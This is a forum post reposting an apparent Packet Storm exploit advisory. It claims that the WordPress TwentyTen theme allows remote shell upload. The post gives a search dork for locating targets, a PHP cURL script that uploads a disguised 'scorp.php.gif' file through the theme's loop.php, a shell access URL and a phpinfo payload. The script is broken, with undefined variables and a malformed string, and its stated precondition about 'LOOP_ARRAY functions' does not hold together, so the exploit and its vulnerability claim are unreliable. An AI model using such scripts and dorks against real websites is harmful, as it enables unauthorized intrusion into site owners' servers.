Praetorian503 Posted December 29, 2012 Report Share Posted December 29, 2012 The WordPress TwentyTen theme suffers from a remote shell upload vulnerability.################################################### Description : Wordpress Themes - TwentyTen Remote File Upload# Author : Agd_Scorp# Contact: vorscorp@hotmail.com# Version : 1.5.x/1.4.x/1.3.x/1.2.x/1.1.x# Link : http://wordpress.org/extend/themes/twentyten# Date : Friday, December 28, 2012# Dork : inurl:/wp-content/themes/twentyten##################################################Fact :this exploit only works if the LOOP_ARRAY functions are enabled in the server, which is disabled by default, although, if the administrator has ever configed the website, the array functions might've been enabled on by default, and cURL must be enabled too.Exploit :<?php$uploadfile="scorp.php.gif";$ch =curl_init("http://www.site.com/wordpress/wp-content/themes/twentyten/loop.php");curl_setopt($ch, CURLOPT_POST, true);curl_setopt($ch, CURLOPT_POSTFIELDS, array('file[]'=>"@$attachfile"));curl_setopt($ch, CURLOPT_POSTFIELDS, array('opt[]'=>"@$connector?rate=50&get_file=0?upload="@$attachfile"));curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$postResult = curl_exec($ch);curl_close($ch);print "$postResult";?>Shell Access : http://www.site.com/wordpress/wp-content/themes/twentyten/scorp.php.gifFilename : $postResult outputscorp.php.gif<?phpphpinfo();?>Source: Packet Storm Quote Link to comment Share on other sites More sharing options...
